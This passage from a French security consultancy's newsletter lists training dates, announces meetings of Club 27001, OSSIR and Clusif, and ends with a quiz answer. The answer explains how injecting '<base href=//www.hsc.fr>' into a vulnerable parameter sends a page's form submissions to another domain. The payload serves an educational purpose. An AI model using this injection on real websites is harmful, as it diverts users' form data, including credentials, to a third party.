 - Bordeaux
        Correspondant Informatique et Libertés .    : 18 au 20 novembre (@)

 - Nantes
        Correspondant Informatique et Libertés .    : 16 au 18 septembre (@)

 - Nice
        Correspondant Informatique et Libertés .    : 14 au 16 décembre (@)

 - Toulouse
        ISO 27001 Lead Implementer    ..........    : 12 au 16 octobre (#)
        Correspondant Informatique et Libertés .    : 4 au 6 novembre (@)
        ISO 27005 Risk Manager    ..............    : 19 au 21 novembre (#)
        ISO 27001 Lead Auditor    ..............    : 9 au 13 mai 2016 (#)

 (#) : formations certifiantes
 (@) : formation labellisée par la CNIL (www.cnil.fr)
 (C) : formation complète

 HSC est certifiée OPQF (http://www.opqf.com/) et ISO9001 par Intertek sur
 ses formations.

 Pour tout renseignement ou inscription, contactez Lynda Benchikh :
 formations at hsc.fr -- +33 141 409 704 ou standard +33 141 409 700

 Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
 notre catalogue 2015 en PDF sur http://www.hsc-formation.fr/



--[ 14. Actualité des associations : Club 27001, OSSIR et Clusif ]--------

  o Club 27001 (http://www.club-27001.fr/)
     . Prochaine réunion à Paris jeudi 17 septembre 2015 chez AG2R La Mondiale
         - "La gouvernance du SMSI au défi de la complexité" par Dominique
           Castan, Atos
         - "Retour d'expérience sur la mise en oeuvre de SMSI dans un
           contexte étranger" par Ramesh Pavadepoulle, Dell Secureworks
     . Autres prochaines réunions annoncées sur
       www.club-27001.fr et dans les listes électroniques. Inscrivez-vous
       sur les listes de chaque ville sur www.club-27001.fr pour suivre
       l'activité du Club 27001 en région.
     . Conférence annuelle le 7 avril 2016, réservez votre date !

 o OSSIR (http://www.ossir.org/)
     . Prochaine réunion à Paris le mardi 8 septembre à l'INRIA
         - "Sentryo" par Laurent Hausermann et Thierry Rouquet (Sentryo)
         - "Gatewatcher" par Philippe Gillet (Gatewatcher)
         - Revue de vulnérabilités
         - Compte-rendu des conférences Blackhat & DEFCON 2015
     . Afterworks à Paris mardi 22 septembre à la Kolok
         - "Digital Forensics Framework" par Frédéric Baguelin et Solal
	    Jacob (Arxsys)
         - "Compte-rendu DEFCON Arnaud Soullié (Solucom)
     . Réunion suivante à Paris le mardi 13 octobre à l'INRIA
         - "Sécurité SAN" par Pierre-Charles Wagrez (Solucom)
         - Revue de vulnérabilités
     . Réunion suivante à Paris le mardi 10 novembre
     . Prochaine réunion à Toulouse mardi 20 octobre à l'Université
         - "Darktrace" par Emily Orlon (Darktrace)
         - Seconde présentation en cours de confirmation
     . Réunion suivante à Toulouse mardi 15 décembre
     . Prochaine réunion à Rennes à la rentrée.
     . Conférence annuelle JSSI le 8 mars 2016 au MAS

 o Clusif (http://www.clusif.fr/)
     . Prochaine conférence mercredi 14 octobre à 16h00 à la CCI
       "Le RSSI : Quelle valeur ajoutée et quel rôle dans l'organisation"
       http://www.clusif.asso.fr/fr/production/cfp/
     . Conférence suivante mardi 15 décembre à 16h00 à la CCI place de la
       Bourse.
       http://www.clusif.fr/



--[ 15. Le saviez-vous ? La réponse ]-------------------------------------

     Lorsque des chemins relatifs sont utilisés, que ce soit pour les
 ressources statiques (telles que les images, scripts, javascript, css) ou
 pour les formulaires, il est possible d'utiliser une balise HTML base[1] afin
 de pouvoir définir le nom de domaine de ces ressources.

 Pour exploiter la vulnérabilité donnée en exemple, il suffit de définir le
 paramètre param à <base href=//www.hsc.fr> (il n'est pas nécessaire de
 préciser http: ou https, le navigateur reprendra le protocole utilisé
 pour charger la page), pour que le formulaire une fois validé envoi son 
 contenu à l'URL: http://www.hsc.fr/form.php.

 [1] https://developer.mozilla.org/fr/docs/Web/HTML/Element/base




Plus d'informations sur la liste de diffusion newsletter